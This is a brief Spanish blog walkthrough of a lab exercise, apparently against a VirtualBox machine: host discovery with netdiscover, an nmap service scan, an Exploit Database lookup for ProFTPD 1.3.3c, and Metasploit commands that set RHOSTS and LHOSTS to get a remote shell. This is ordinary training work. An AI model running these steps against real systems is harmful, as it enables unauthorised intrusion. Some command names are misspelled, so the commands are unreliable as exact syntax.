Instalar maquina poner en modo puente #

Buscar la ip #

sudo netdiscover -r 10.0.0.0/16

10.0.4.39 08:00:27:9b:76:e6 39 2340 PCS Systemtechnik GmbH

Vemos las ip

sudo nmap 10.0.4.39
nmap -Pn -sV 10.0.4.39

PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:9B:76:E6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Buscamos vulnerabilidades que tiene los servicios #

Exploit database
Google
Chat gpt

En Exploit database introducimos el servicio de ProFTPD 1.3.3c, nos dice que hay disponible un metaexploit.

Ejecutar el metaexploit #

Abrir la consola mfsconsole

 sudo mfsconsole

Buscar exploit que vamos a usar

 search ProFTPD 1.3.3c

Seleccionamos el payloads que vamos a usas

 show payload

PONEMOS ES QUE NOSOTROS QUERAMOS O MÁS NOS GUSTE

Una vez seleccionado ponemos los parametros que necesitamos

 show options

 set RHOSTS 10.0.4.39
 set LHOSTS "MI IP"

Ejecutar

run

Ya se levantaria un shell para acceder a la maquina

Esto es todo. Espero que os haya gustado.

Published 04 Mar 2025